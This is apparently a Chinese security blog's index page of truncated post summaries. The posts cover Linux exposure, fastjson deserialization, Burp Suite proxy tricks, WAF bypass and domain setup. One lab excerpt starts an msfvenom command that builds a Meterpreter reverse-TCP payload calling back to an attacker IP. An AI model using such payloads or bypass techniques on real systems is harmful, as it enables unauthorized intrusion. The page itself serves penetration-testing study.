摘要:
文章转载于:https://www.cnblogs.com/bmjoker/p/10485793.html 现在大多数企业都是使用linux作为服务器,不仅是linux是开源系统,更是因为linux比windows更安全。但是由于管理员的安全意识不全或者疏忽,导致linux的敏感端口和服务没有正确的 阅读全文
摘要:
备注:此文章转载至暗月公众号moonsec 1 介绍 文章放在内部系统有有段历史 近期有项目 用到早上视频录制突然断了。发个文章,分享一波。 https://www.vultr.com 一个挺有名的vps服务商 用邮箱注册,支持支付宝 watch付款。 支付自定义iso安装。可以利用这个安装kali 阅读全文
摘要:
0x01 简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 0x02 漏洞概述 首先,Fastjson提供了autotype功能,允许用户在反序 阅读全文
摘要:
转载自:https://juejin.im/post/6844903490595061767 前言 一、TCP/IP模型 TCP/IP协议模型(Transmission Control Protocol/Internet Protocol),包含了一系列构成互联网基础的网络协议,是Internet的 阅读全文
摘要:
burpsuite和fiddle进行串联抓包: Tools->Options->Connections->Gateway,然后在Manual Proxy Configuration当中输入以下内容: http://127.0.0.1:8080;https://127.0.0.1:8080 设置好这两 阅读全文
摘要:
介绍:此工具根据官方文档介绍和自己使用,发现用来测试未授权访问和越权有很不错的效果,能极大的简化手工测试的效率。以下将以截图和文字描述的方式来介绍该工具的使用,如有不对之处,还望大佬指出 1、安装方法 插件下载可以去商店下载,或者github下载,下载链接https://github.com/ncc 阅读全文
摘要:
由于这些软件的流量使用软件本身的浏览器与服务器进行交互,所以只能使用其他软件抓包,比如filder等,但是filder抓的是系统代理,导致转发到burp时会出现很多不是自己想要的流量,所以我介绍一个比较好用的技巧:PAC,关于pac的介绍请看这篇文章https://blog.csdn.net/lio 阅读全文
摘要:
0x00 前言 随着国家安全法的出台,网络安全迎来发展的新时期,越来越多企业或政府单位开始重视网络安全。很多网站陆陆续续告别裸奔时代,开始部署web应用防火墙(WAF)以应对网络攻击。由此,相关网站的安全性很大程度上取决于WAF的防护能力,WAF攻防研究已成为安全从业人员的必修课之一。 大多数WAF 阅读全文
摘要:
首先搭建一个域服务器,后续的机器全部加入该域控 --安装命令DCPROMO 然后一直点下一步即可 --删除域命令,在服务器端删除,命令也是dcpromo,前提是尽量所有用户都已经退出域 阅读全文
摘要:
准备环境:攻击机kali:192.168.1.104 靶机:win2008 :192.168.1.103 192.168.137.130(模拟内网ip) 使用msfvenom生成一个木马,msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=19 阅读全文